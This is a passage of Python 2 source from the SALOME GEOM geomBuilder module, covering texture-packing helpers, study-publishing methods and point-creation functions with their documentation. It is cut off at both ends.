## If the string contains invalid symbol (neither '1' nor '0'), the function raises an exception.
## For example,
## \code
## val = PackData("10001110") # val = 0xAE
## val = PackData("1") # val = 0x80
## \endcode
## @param data unpacked data - a string containing '1' and '0' symbols
## @return data packed to the byte stream
## @ingroup l1_geomBuilder_auxiliary
def PackData(data):
"""
Helper function which can be used to pack the passed string to the byte data.
Only '1' an '0' symbols are valid for the string. The missing bits are replaced by zeroes.
If the string contains invalid symbol (neither '1' nor '0'), the function raises an exception.
Parameters:
data unpacked data - a string containing '1' and '0' symbols
Returns:
data packed to the byte stream
Example of usage:
val = PackData("10001110") # val = 0xAE
val = PackData("1") # val = 0x80
"""
bytes = len(data)/8
if len(data)%8: bytes += 1
res = ""
for b in range(bytes):
d = data[b*8:(b+1)*8]
val = 0
for i in range(8):
val *= 2
if i < len(d):
if d[i] == "1": val += 1
elif d[i] != "0":
raise "Invalid symbol %s" % d[i]
pass
pass
res += chr(val)
pass
return res
## Read bitmap texture from the text file.
## In that file, any non-zero symbol represents '1' opaque pixel of the bitmap.
## A zero symbol ('0') represents transparent pixel of the texture bitmap.
## The function returns width and height of the pixmap in pixels and byte stream representing
## texture bitmap itself.
##
## This function can be used to read the texture to the byte stream in order to pass it to
## the AddTexture() function of geomBuilder class.
## For example,
## \code
## from salome.geom import geomBuilder
## geompy = geomBuilder.New(salome.myStudy)
## texture = geompy.readtexture('mytexture.dat')
## texture = geompy.AddTexture(*texture)
## obj.SetMarkerTexture(texture)
## \endcode
## @param fname texture file name
## @return sequence of tree values: texture's width, height in pixels and its byte stream
## @ingroup l1_geomBuilder_auxiliary
def ReadTexture(fname):
"""
Read bitmap texture from the text file.
In that file, any non-zero symbol represents '1' opaque pixel of the bitmap.
A zero symbol ('0') represents transparent pixel of the texture bitmap.
The function returns width and height of the pixmap in pixels and byte stream representing
texture bitmap itself.
This function can be used to read the texture to the byte stream in order to pass it to
the AddTexture() function of geomBuilder class.
Parameters:
fname texture file name
Returns:
sequence of tree values: texture's width, height in pixels and its byte stream
Example of usage:
from salome.geom import geomBuilder
geompy = geomBuilder.New(salome.myStudy)
texture = geompy.readtexture('mytexture.dat')
texture = geompy.AddTexture(*texture)
obj.SetMarkerTexture(texture)
"""
try:
f = open(fname)
lines = [ l.strip() for l in f.readlines()]
f.close()
maxlen = 0
if lines: maxlen = max([len(x) for x in lines])
lenbytes = maxlen/8
if maxlen%8: lenbytes += 1
bytedata=""
for line in lines:
if len(line)%8:
lenline = (len(line)/8+1)*8
pass
else:
lenline = (len(line)/8)*8
pass
for i in range(lenline/8):
byte=""
for j in range(8):
if i*8+j < len(line) and line[i*8+j] != "0": byte += "1"
else: byte += "0"
pass
bytedata += PackData(byte)
pass
for i in range(lenline/8, lenbytes):
bytedata += PackData("0")
pass
return lenbytes*8, len(lines), bytedata
except:
pass
return 0, 0, ""
## Returns a long value from enumeration type
# Can be used for CORBA enumerator types like GEOM.shape_type
# @param theItem enumeration type
# @ingroup l1_geomBuilder_auxiliary
def EnumToLong(theItem):
"""
Returns a long value from enumeration type
Can be used for CORBA enumerator types like geomBuilder.ShapeType
Parameters:
theItem enumeration type
"""
ret = theItem
if hasattr(theItem, "_v"): ret = theItem._v
return ret
## Information about closed/unclosed state of shell or wire
# @ingroup l1_geomBuilder_auxiliary
class info:
"""
Information about closed/unclosed state of shell or wire
"""
UNKNOWN = 0
CLOSED = 1
UNCLOSED = 2
## Private class used to bind calls of plugin operations to geomBuilder
class PluginOperation:
def __init__(self, operation, function):
self.operation = operation
self.function = function
pass
@ManageTransactions("operation")
def __call__(self, *args):
res = self.function(self.operation, *args)
RaiseIfFailed(self.function.__name__, self.operation)
return res
# Warning: geom is a singleton
geom = None
engine = None
doLcc = False
created = False
class geomBuilder(object, GEOM._objref_GEOM_Gen):
## Enumeration ShapeType as a dictionary. \n
## Topological types of shapes (like Open Cascade types). See GEOM::shape_type for details.
# @ingroup l1_geomBuilder_auxiliary
ShapeType = {"AUTO":-1, "COMPOUND":0, "COMPSOLID":1, "SOLID":2, "SHELL":3, "FACE":4, "WIRE":5, "EDGE":6, "VERTEX":7, "SHAPE":8}
## Kinds of shape in terms of <VAR>GEOM.GEOM_IKindOfShape.shape_kind</VAR> enumeration
# and a list of parameters, describing the shape.
# List of parameters, describing the shape:
# - COMPOUND: [nb_solids nb_faces nb_edges nb_vertices]
# - COMPSOLID: [nb_solids nb_faces nb_edges nb_vertices]
#
# - SHELL: [info.CLOSED / info.UNCLOSED nb_faces nb_edges nb_vertices]
#
# - WIRE: [info.CLOSED / info.UNCLOSED nb_edges nb_vertices]
#
# - SPHERE: [xc yc zc R]
# - CYLINDER: [xb yb zb dx dy dz R H]
# - BOX: [xc yc zc ax ay az]
# - ROTATED_BOX: [xc yc zc zx zy zz xx xy xz ax ay az]
# - TORUS: [xc yc zc dx dy dz R_1 R_2]
# - CONE: [xb yb zb dx dy dz R_1 R_2 H]
# - POLYHEDRON: [nb_faces nb_edges nb_vertices]
# - SOLID: [nb_faces nb_edges nb_vertices]
#
# - SPHERE2D: [xc yc zc R]
# - CYLINDER2D: [xb yb zb dx dy dz R H]
# - TORUS2D: [xc yc zc dx dy dz R_1 R_2]
# - CONE2D: [xc yc zc dx dy dz R_1 R_2 H]
# - DISK_CIRCLE: [xc yc zc dx dy dz R]
# - DISK_ELLIPSE: [xc yc zc dx dy dz R_1 R_2]
# - POLYGON: [xo yo zo dx dy dz nb_edges nb_vertices]
# - PLANE: [xo yo zo dx dy dz]
# - PLANAR: [xo yo zo dx dy dz nb_edges nb_vertices]
# - FACE: [nb_edges nb_vertices]
#
# - CIRCLE: [xc yc zc dx dy dz R]
# - ARC_CIRCLE: [xc yc zc dx dy dz R x1 y1 z1 x2 y2 z2]
# - ELLIPSE: [xc yc zc dx dy dz R_1 R_2]
# - ARC_ELLIPSE: [xc yc zc dx dy dz R_1 R_2 x1 y1 z1 x2 y2 z2]
# - LINE: [xo yo zo dx dy dz]
# - SEGMENT: [x1 y1 z1 x2 y2 z2]
# - EDGE: [nb_vertices]
#
# - VERTEX: [x y z]
# @ingroup l1_geomBuilder_auxiliary
kind = GEOM.GEOM_IKindOfShape
def __new__(cls):
global engine
global geom
global doLcc
global created
#print "==== __new__ ", engine, geom, doLcc, created
if geom is None:
# geom engine is either retrieved from engine, or created
geom = engine
# Following test avoids a recursive loop
if doLcc:
if geom is not None:
# geom engine not created: existing engine found
doLcc = False
if doLcc and not created:
doLcc = False
# FindOrLoadComponent called:
# 1. CORBA resolution of server
# 2. the __new__ method is called again
#print "==== FindOrLoadComponent ", engine, geom, doLcc, created
geom = lcc.FindOrLoadComponent( "FactoryServer", "GEOM" )
#print "====1 ",geom
else:
# FindOrLoadComponent not called
if geom is None:
# geomBuilder instance is created from lcc.FindOrLoadComponent
#print "==== super ", engine, geom, doLcc, created
geom = super(geomBuilder,cls).__new__(cls)
#print "====2 ",geom
else:
# geom engine not created: existing engine found
#print "==== existing ", engine, geom, doLcc, created
pass
#print "return geom 1 ", geom
return geom
#print "return geom 2 ", geom
return geom
def __init__(self):
global created
#print "-------- geomBuilder __init__ --- ", created, self
if not created:
created = True
GEOM._objref_GEOM_Gen.__init__(self)
self.myMaxNbSubShapesAllowed = 0 # auto-publishing is disabled by default
self.myBuilder = None
self.myStudyId = 0
self.father = None
self.BasicOp = None
self.CurvesOp = None
self.PrimOp = None
self.ShapesOp = None
self.HealOp = None
self.InsertOp = None
self.BoolOp = None
self.TrsfOp = None
self.LocalOp = None
self.MeasuOp = None
self.BlocksOp = None
self.GroupOp = None
self.FieldOp = None
pass
## Process object publication in the study, as follows:
# - if @a theName is specified (not None), the object is published in the study
# with this name, not taking into account "auto-publishing" option;
# - if @a theName is NOT specified, the object is published in the study
# (using default name, which can be customized using @a theDefaultName parameter)
# only if auto-publishing is switched on.
#
# @param theObj object, a subject for publishing
# @param theName object name for study
# @param theDefaultName default name for the auto-publishing
#
# @sa addToStudyAuto()
def _autoPublish(self, theObj, theName, theDefaultName="noname"):
# ---
def _item_name(_names, _defname, _idx=-1):
if not _names: _names = _defname
if type(_names) in [types.ListType, types.TupleType]:
if _idx >= 0:
if _idx >= len(_names) or not _names[_idx]:
if type(_defname) not in [types.ListType, types.TupleType]:
_name = "%s_%d"%(_defname, _idx+1)
elif len(_defname) > 0 and _idx >= 0 and _idx < len(_defname):
_name = _defname[_idx]
else:
_name = "%noname_%d"%(dn, _idx+1)
pass
else:
_name = _names[_idx]
pass
else:
# must be wrong usage
_name = _names[0]
pass
else:
if _idx >= 0:
_name = "%s_%d"%(_names, _idx+1)
else:
_name = _names
pass
return _name
# ---
def _publish( _name, _obj ):
fatherObj = None
if isinstance( _obj, GEOM._objref_GEOM_Field ):
fatherObj = _obj.GetShape()
elif isinstance( _obj, GEOM._objref_GEOM_FieldStep ):
fatherObj = _obj.GetField()
elif not _obj.IsMainShape():
fatherObj = _obj.GetMainShape()
pass
if fatherObj and fatherObj.GetStudyEntry():
self.addToStudyInFather(fatherObj, _obj, _name)
else:
self.addToStudy(_obj, _name)
pass
return
# ---
if not theObj:
return # null object
if not theName and not self.myMaxNbSubShapesAllowed:
return # nothing to do: auto-publishing is disabled
if not theName and not theDefaultName:
return # neither theName nor theDefaultName is given
import types
if type(theObj) in [types.ListType, types.TupleType]:
# list of objects is being published
idx = 0
for obj in theObj:
if not obj: continue # bad object
name = _item_name(theName, theDefaultName, idx)
_publish( name, obj )
idx = idx+1
if not theName and idx == self.myMaxNbSubShapesAllowed: break
pass
pass
else:
# single object is published
name = _item_name(theName, theDefaultName)
_publish( name, theObj )
pass
## @addtogroup l1_geomBuilder_auxiliary
## @{
def init_geom(self,theStudy):
self.myStudy = theStudy
self.myStudyId = self.myStudy._get_StudyId()
self.myBuilder = self.myStudy.NewBuilder()
self.father = self.myStudy.FindComponent("GEOM")
notebook.myStudy = theStudy
if self.father is None:
self.father = self.myBuilder.NewComponent("GEOM")
A1 = self.myBuilder.FindOrCreateAttribute(self.father, "AttributeName")
FName = A1._narrow(SALOMEDS.AttributeName)
FName.SetValue("Geometry")
A2 = self.myBuilder.FindOrCreateAttribute(self.father, "AttributePixMap")
aPixmap = A2._narrow(SALOMEDS.AttributePixMap)
aPixmap.SetPixMap("ICON_OBJBROWSER_Geometry")
self.myBuilder.DefineComponentInstance(self.father,self)
pass
self.BasicOp = self.GetIBasicOperations (self.myStudyId)
self.CurvesOp = self.GetICurvesOperations (self.myStudyId)
self.PrimOp = self.GetI3DPrimOperations (self.myStudyId)
self.ShapesOp = self.GetIShapesOperations (self.myStudyId)
self.HealOp = self.GetIHealingOperations (self.myStudyId)
self.InsertOp = self.GetIInsertOperations (self.myStudyId)
self.BoolOp = self.GetIBooleanOperations (self.myStudyId)
self.TrsfOp = self.GetITransformOperations(self.myStudyId)
self.LocalOp = self.GetILocalOperations (self.myStudyId)
self.MeasuOp = self.GetIMeasureOperations (self.myStudyId)
self.BlocksOp = self.GetIBlocksOperations (self.myStudyId)
self.GroupOp = self.GetIGroupOperations (self.myStudyId)
self.FieldOp = self.GetIFieldOperations (self.myStudyId)
# set GEOM as root in the use case tree
self.myUseCaseBuilder = self.myStudy.GetUseCaseBuilder()
self.myUseCaseBuilder.SetRootCurrent()
self.myUseCaseBuilder.Append(self.father)
pass
def GetPluginOperations(self, studyID, libraryName):
op = GEOM._objref_GEOM_Gen.GetPluginOperations(self, studyID, libraryName)
return op
## Enable / disable results auto-publishing
#
# The automatic publishing is managed in the following way:
# - if @a maxNbSubShapes = 0, automatic publishing is disabled.
# - if @a maxNbSubShapes = -1 (default), automatic publishing is enabled and
# maximum number of sub-shapes allowed for publishing is unlimited; any negative
# value passed as parameter has the same effect.
# - if @a maxNbSubShapes is any positive value, automatic publishing is enabled and
# maximum number of sub-shapes allowed for publishing is set to specified value.
#
# @param maxNbSubShapes maximum number of sub-shapes allowed for publishing.
# @ingroup l1_publish_data
def addToStudyAuto(self, maxNbSubShapes=-1):
"""
Enable / disable results auto-publishing
The automatic publishing is managed in the following way:
- if @a maxNbSubShapes = 0, automatic publishing is disabled;
- if @a maxNbSubShapes = -1 (default), automatic publishing is enabled and
maximum number of sub-shapes allowed for publishing is unlimited; any negative
value passed as parameter has the same effect.
- if @a maxNbSubShapes is any positive value, automatic publishing is enabled and
maximum number of sub-shapes allowed for publishing is set to this value.
Parameters:
maxNbSubShapes maximum number of sub-shapes allowed for publishing.
Example of usage:
geompy.addToStudyAuto() # enable auto-publishing
geompy.MakeBoxDXDYDZ(100) # box is created and published with default name
geompy.addToStudyAuto(0) # disable auto-publishing
"""
self.myMaxNbSubShapesAllowed = max(-1, maxNbSubShapes)
pass
## Dump component to the Python script
# This method overrides IDL function to allow default values for the parameters.
def DumpPython(self, theStudy, theIsPublished=True, theIsMultiFile=True):
"""
Dump component to the Python script
This method overrides IDL function to allow default values for the parameters.
"""
return GEOM._objref_GEOM_Gen.DumpPython(self, theStudy, theIsPublished, theIsMultiFile)
## Get name for sub-shape aSubObj of shape aMainObj
#
# @ref swig_SubShapeName "Example"
@ManageTransactions("ShapesOp")
def SubShapeName(self,aSubObj, aMainObj):
"""
Get name for sub-shape aSubObj of shape aMainObj
"""
# Example: see GEOM_TestAll.py
#aSubId = orb.object_to_string(aSubObj)
#aMainId = orb.object_to_string(aMainObj)
#index = gg.getIndexTopology(aSubId, aMainId)
#name = gg.getShapeTypeString(aSubId) + "_%d"%(index)
index = self.ShapesOp.GetTopologyIndex(aMainObj, aSubObj)
name = self.ShapesOp.GetShapeTypeString(aSubObj) + "_%d"%(index)
return name
## Publish in study aShape with name aName
#
# \param aShape the shape to be published
# \param aName the name for the shape
# \param doRestoreSubShapes if True, finds and publishes also
# sub-shapes of <VAR>aShape</VAR>, corresponding to its arguments
# and published sub-shapes of arguments
# \param theArgs,theFindMethod,theInheritFirstArg see RestoreSubShapes() for
# these arguments description
# \return study entry of the published shape in form of string
#
# @ingroup l1_publish_data
# @ref swig_all_addtostudy "Example"
def addToStudy(self, aShape, aName, doRestoreSubShapes=False,
theArgs=[], theFindMethod=GEOM.FSM_GetInPlace, theInheritFirstArg=False):
"""
Publish in study aShape with name aName
Parameters:
aShape the shape to be published
aName the name for the shape
doRestoreSubShapes if True, finds and publishes also
sub-shapes of aShape, corresponding to its arguments
and published sub-shapes of arguments
theArgs,theFindMethod,theInheritFirstArg see geompy.RestoreSubShapes() for
these arguments description
Returns:
study entry of the published shape in form of string
Example of usage:
id_block1 = geompy.addToStudy(Block1, "Block 1")
"""
# Example: see GEOM_TestAll.py
try:
aSObject = self.AddInStudy(self.myStudy, aShape, aName, None)
if aSObject and aName: aSObject.SetAttrString("AttributeName", aName)
if doRestoreSubShapes:
self.RestoreSubShapesSO(self.myStudy, aSObject, theArgs,
theFindMethod, theInheritFirstArg, True )
except:
print "addToStudy() failed"
return ""
return aShape.GetStudyEntry()
## Publish in study aShape with name aName as sub-object of previously published aFather
# \param aFather previously published object
# \param aShape the shape to be published as sub-object of <VAR>aFather</VAR>
# \param aName the name for the shape
#
# \return study entry of the published shape in form of string
#
# @ingroup l1_publish_data
# @ref swig_all_addtostudyInFather "Example"
def addToStudyInFather(self, aFather, aShape, aName):
"""
Publish in study aShape with name aName as sub-object of previously published aFather
Parameters:
aFather previously published object
aShape the shape to be published as sub-object of aFather
aName the name for the shape
Returns:
study entry of the published shape in form of string
"""
# Example: see GEOM_TestAll.py
try:
aSObject = self.AddInStudy(self.myStudy, aShape, aName, aFather)
if aSObject and aName: aSObject.SetAttrString("AttributeName", aName)
except:
print "addToStudyInFather() failed"
return ""
return aShape.GetStudyEntry()
## Unpublish object in study
#
# \param obj the object to be unpublished
def hideInStudy(self, obj):
"""
Unpublish object in study
Parameters:
obj the object to be unpublished
"""
ior = salome.orb.object_to_string(obj)
aSObject = self.myStudy.FindObjectIOR(ior)
if aSObject is not None:
genericAttribute = self.myBuilder.FindOrCreateAttribute(aSObject, "AttributeDrawable")
drwAttribute = genericAttribute._narrow(SALOMEDS.AttributeDrawable)
drwAttribute.SetDrawable(False)
# hide references if any
vso = self.myStudy.FindDependances(aSObject);
for refObj in vso :
genericAttribute = self.myBuilder.FindOrCreateAttribute(refObj, "AttributeDrawable")
drwAttribute = genericAttribute._narrow(SALOMEDS.AttributeDrawable)
drwAttribute.SetDrawable(False)
pass
pass
# end of l1_geomBuilder_auxiliary
## @}
## @addtogroup l3_restore_ss
## @{
## Publish sub-shapes, standing for arguments and sub-shapes of arguments
# To be used from python scripts out of addToStudy() (non-default usage)
# \param theObject published GEOM.GEOM_Object, arguments of which will be published
# \param theArgs list of GEOM.GEOM_Object, operation arguments to be published.
# If this list is empty, all operation arguments will be published
# \param theFindMethod method to search sub-shapes, corresponding to arguments and
# their sub-shapes. Value from enumeration GEOM.find_shape_method.
# \param theInheritFirstArg set properties of the first argument for <VAR>theObject</VAR>.
# Do not publish sub-shapes in place of arguments, but only
# in place of sub-shapes of the first argument,
# because the whole shape corresponds to the first argument.
# Mainly to be used after transformations, but it also can be
# usefull after partition with one object shape, and some other
# operations, where only the first argument has to be considered.
# If theObject has only one argument shape, this flag is automatically
# considered as True, not regarding really passed value.
# \param theAddPrefix add prefix "from_" to names of restored sub-shapes,
# and prefix "from_subshapes_of_" to names of partially restored sub-shapes.
# \return list of published sub-shapes
#
# @ref tui_restore_prs_params "Example"
def RestoreSubShapes (self, theObject, theArgs=[], theFindMethod=GEOM.FSM_GetInPlace,
theInheritFirstArg=False, theAddPrefix=True):
"""
Publish sub-shapes, standing for arguments and sub-shapes of arguments
To be used from python scripts out of geompy.addToStudy (non-default usage)
Parameters:
theObject published GEOM.GEOM_Object, arguments of which will be published
theArgs list of GEOM.GEOM_Object, operation arguments to be published.
If this list is empty, all operation arguments will be published
theFindMethod method to search sub-shapes, corresponding to arguments and
their sub-shapes. Value from enumeration GEOM.find_shape_method.
theInheritFirstArg set properties of the first argument for theObject.
Do not publish sub-shapes in place of arguments, but only
in place of sub-shapes of the first argument,
because the whole shape corresponds to the first argument.
Mainly to be used after transformations, but it also can be
usefull after partition with one object shape, and some other
operations, where only the first argument has to be considered.
If theObject has only one argument shape, this flag is automatically
considered as True, not regarding really passed value.
theAddPrefix add prefix "from_" to names of restored sub-shapes,
and prefix "from_subshapes_of_" to names of partially restored sub-shapes.
Returns:
list of published sub-shapes
"""
# Example: see GEOM_TestAll.py
return self.RestoreSubShapesO(self.myStudy, theObject, theArgs,
theFindMethod, theInheritFirstArg, theAddPrefix)
## Publish sub-shapes, standing for arguments and sub-shapes of arguments
# To be used from python scripts out of addToStudy() (non-default usage)
# \param theObject published GEOM.GEOM_Object, arguments of which will be published
# \param theArgs list of GEOM.GEOM_Object, operation arguments to be published.
# If this list is empty, all operation arguments will be published
# \param theFindMethod method to search sub-shapes, corresponding to arguments and
# their sub-shapes. Value from enumeration GEOM::find_shape_method.
# \param theInheritFirstArg set properties of the first argument for <VAR>theObject</VAR>.
# Do not publish sub-shapes in place of arguments, but only
# in place of sub-shapes of the first argument,
# because the whole shape corresponds to the first argument.
# Mainly to be used after transformations, but it also can be
# usefull after partition with one object shape, and some other
# operations, where only the first argument has to be considered.
# If theObject has only one argument shape, this flag is automatically
# considered as True, not regarding really passed value.
# \param theAddPrefix add prefix "from_" to names of restored sub-shapes,
# and prefix "from_subshapes_of_" to names of partially restored sub-shapes.
# \return list of published sub-shapes
#
# @ref tui_restore_prs_params "Example"
def RestoreGivenSubShapes (self, theObject, theArgs=[], theFindMethod=GEOM.FSM_GetInPlace,
theInheritFirstArg=False, theAddPrefix=True):
"""
Publish sub-shapes, standing for arguments and sub-shapes of arguments
To be used from python scripts out of geompy.addToStudy() (non-default usage)
Parameters:
theObject published GEOM.GEOM_Object, arguments of which will be published
theArgs list of GEOM.GEOM_Object, operation arguments to be published.
If this list is empty, all operation arguments will be published
theFindMethod method to search sub-shapes, corresponding to arguments and
their sub-shapes. Value from enumeration GEOM::find_shape_method.
theInheritFirstArg set properties of the first argument for theObject.
Do not publish sub-shapes in place of arguments, but only
in place of sub-shapes of the first argument,
because the whole shape corresponds to the first argument.
Mainly to be used after transformations, but it also can be
usefull after partition with one object shape, and some other
operations, where only the first argument has to be considered.
If theObject has only one argument shape, this flag is automatically
considered as True, not regarding really passed value.
theAddPrefix add prefix "from_" to names of restored sub-shapes,
and prefix "from_subshapes_of_" to names of partially restored sub-shapes.
Returns:
list of published sub-shapes
"""
# Example: see GEOM_TestAll.py
return self.RestoreGivenSubShapesO(self.myStudy, theObject, theArgs,
theFindMethod, theInheritFirstArg, theAddPrefix)
# end of l3_restore_ss
## @}
## @addtogroup l3_basic_go
## @{
## Create point by three coordinates.
# @param theX The X coordinate of the point.
# @param theY The Y coordinate of the point.
# @param theZ The Z coordinate of the point.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created point.
#
# @ref tui_creation_point "Example"
@ManageTransactions("BasicOp")
def MakeVertex(self, theX, theY, theZ, theName=None):
"""
Create point by three coordinates.
Parameters:
theX The X coordinate of the point.
theY The Y coordinate of the point.
theZ The Z coordinate of the point.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created point.
"""
# Example: see GEOM_TestAll.py
theX,theY,theZ,Parameters = ParseParameters(theX, theY, theZ)
anObj = self.BasicOp.MakePointXYZ(theX, theY, theZ)
RaiseIfFailed("MakePointXYZ", self.BasicOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "vertex")
return anObj
## Create a point, distant from the referenced point
# on the given distances along the coordinate axes.
# @param theReference The referenced point.
# @param theX Displacement from the referenced point along OX axis.
# @param theY Displacement from the referenced point along OY axis.
# @param theZ Displacement from the referenced point along OZ axis.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created point.
#
# @ref tui_creation_point "Example"
@ManageTransactions("BasicOp")
def MakeVertexWithRef(self, theReference, theX, theY, theZ, theName=None):
"""
Create a point, distant from the referenced point
on the given distances along the coordinate axes.
Parameters:
theReference The referenced point.
theX Displacement from the referenced point along OX axis.
theY Displacement from the referenced point along OY axis.
theZ Displacement from the referenced point along OZ axis.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created point.
"""
# Example: see GEOM_TestAll.py
theX,theY,theZ,Parameters = ParseParameters(theX, theY, theZ)
anObj = self.BasicOp.MakePointWithReference(theReference, theX, theY, theZ)
RaiseIfFailed("MakePointWithReference", self.BasicOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "vertex")
return anObj
## Create a point, corresponding to the given parameter on the given curve.
# @param theRefCurve The referenced curve.
# @param theParameter Value of parameter on the referenced curve.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created point.
#
# @ref tui_creation_point "Example"
@ManageTransactions("BasicOp")
def MakeVertexOnCurve(self, theRefCurve, theParameter, theName=None):
"""
Create a point, corresponding to the given parameter on the given curve.
Parameters:
theRefCurve The referenced curve.
theParameter Value of parameter on the referenced curve.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created point.
Example of usage:
p_on_arc = geompy.MakeVertexOnCurve(Arc, 0.25)
"""
# Example: see GEOM_TestAll.py
theParameter, Parameters = ParseParameters(theParameter)
anObj = self.BasicOp.MakePointOnCurve(theRefCurve, theParameter)
RaiseIfFailed("MakePointOnCurve", self.BasicOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "vertex")
return anObj
## Create a point by projection give coordinates on the given curve
# @param theRefCurve The referenced curve.
# @param theX X-coordinate in 3D space
# @param theY Y-coordinate in 3D space
# @param theZ Z-coordinate in 3D space
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created point.
#
# @ref tui_creation_point "Example"
@ManageTransactions("BasicOp")
def MakeVertexOnCurveByCoord(self, theRefCurve, theX, theY, theZ, theName=None):
"""
Create a point by projection give coordinates on the given curve
Parameters:
theRefCurve The referenced curve.
theX X-coordinate in 3D space
theY Y-coordinate in 3D space
theZ Z-coordinate in 3D space
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created point.
Example of usage:
p_on_arc3 = geompy.MakeVertexOnCurveByCoord(Arc, 100, -10, 10)
"""
# Example: see GEOM_TestAll.py
theX, theY, theZ, Parameters = ParseParameters(theX, theY, theZ)
anObj = self.BasicOp.MakePointOnCurveByCoord(theRefCurve, theX, theY, theZ)
RaiseIfFailed("MakeVertexOnCurveByCoord", self.BasicOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "vertex")
return anObj
## Create a point, corresponding to the given length on the given curve.
# @param theRefCurve The referenced curve.
# @param theLength Length on the referenced curve. It can be negative.
# @param theStartPoint Point allowing to choose the direction for the calculation
# of the length. If None, start from the first point of theRefCurve.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created point.
#
# @ref tui_creation_point "Example"
@ManageTransactions("BasicOp")
def MakeVertexOnCurveByLength(self, theRefCurve, theLength, theStartPoint = None, theName=None):
"""
Create a point, corresponding to the given length on the given curve.
Parameters:
theRefCurve The referenced curve.
theLength Length on the referenced curve. It can be negative.
theStartPoint Point allowing to choose the direction for the calculation
of the length. If None, start from the first point of theRefCurve.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created point.
"""
# Example: see GEOM_TestAll.py
theLength, Parameters = ParseParameters(theLength)
anObj = self.BasicOp.MakePointOnCurveByLength(theRefCurve, theLength, theStartPoint)
RaiseIfFailed("MakePointOnCurveByLength", self.BasicOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "vertex")
return anObj
## Create a point, corresponding to the given parameters on the
# given surface.
# @param theRefSurf The referenced surface.
# @param theUParameter Value of U-parameter on the referenced surface.
# @param theVParameter Value of V-parameter on the referenced surface.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created point.
#
# @ref swig_MakeVertexOnSurface "Example"
@ManageTransactions("BasicOp")
def MakeVertexOnSurface(self, theRefSurf, theUParameter, theVParameter, theName=None):
"""
Create a point, corresponding to the given parameters on the
given surface.
Parameters:
theRefSurf The referenced surface.
theUParameter Value of U-parameter on the referenced surface.
theVParameter Value of V-parameter on the referenced surface.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created point.
Example of usage:
p_on_face = geompy.MakeVertexOnSurface(Face, 0.1, 0.8)
"""
theUParameter, theVParameter, Parameters = ParseParameters(theUParameter, theVParameter)
# Example: see GEOM_TestAll.py
anObj = self.BasicOp.MakePointOnSurface(theRefSurf, theUParameter, theVParameter)
RaiseIfFailed("MakePointOnSurface", self.BasicOp)
anObj.SetParameters(Parameters);
self._autoPublish(anObj, theName, "vertex")
return anObj
## Create a point by projection give coordinates on the given surface
# @param theRefSurf The referenced surface.
# @param theX X-coordinate in 3D space
# @param theY Y-coordinate in 3D space
# @param theZ Z-coordinate in 3D space
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created point.
#
# @ref swig_MakeVertexOnSurfaceByCoord "Example"
@ManageTransactions("BasicOp")
def MakeVertexOnSurfaceByCoord(self, theRefSurf, theX, theY, theZ, theName=None):
"""
Create a point by projection give coordinates on the given surface
Parameters:
theRefSurf The referenced surface.
theX X-coordinate in 3D space
theY Y-coordinate in 3D space
theZ Z-coordinate in 3D space
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created point.
Example of usage:
p_on_face2 = geompy.MakeVertexOnSurfaceByCoord(Face, 0., 0., 0.)
"""
theX, theY, theZ, Parameters = ParseParameters(theX, theY, theZ)
# Example: see GEOM_TestAll.py
anObj = self.BasicOp.MakePointOnSurfaceByCoord(theRefSurf, theX, theY, theZ)
RaiseIfFailed("MakeVertexOnSurfaceByCoord", self.BasicOp)
anObj.SetParameters(Parameters);
self._autoPublish(anObj, theName, "vertex")
return anObj
## Create a point, which lays on the given face.
# The point will lay in arbitrary place of the face.
# The only condition on it is a non-zero distance to the face boundary.
# Such point can be used to uniquely identify the face inside any
# shape in case, when the shape does not contain overlapped faces.
# @param theFace The referenced face.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created point.
#
# @ref swig_MakeVertexInsideFace "Example"
@ManageTransactions("BasicOp")
def MakeVertexInsideFace (self, theFace, theName=None):
"""
Create a point, which lays on the given face.
The point will lay in arbitrary place of the face.
The only condition on it is a non-zero distance to the face boundary.
Such point can be used to uniquely identify the face inside any
shape in case, when the shape does not contain overlapped faces.
Parameters:
theFace The referenced face.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
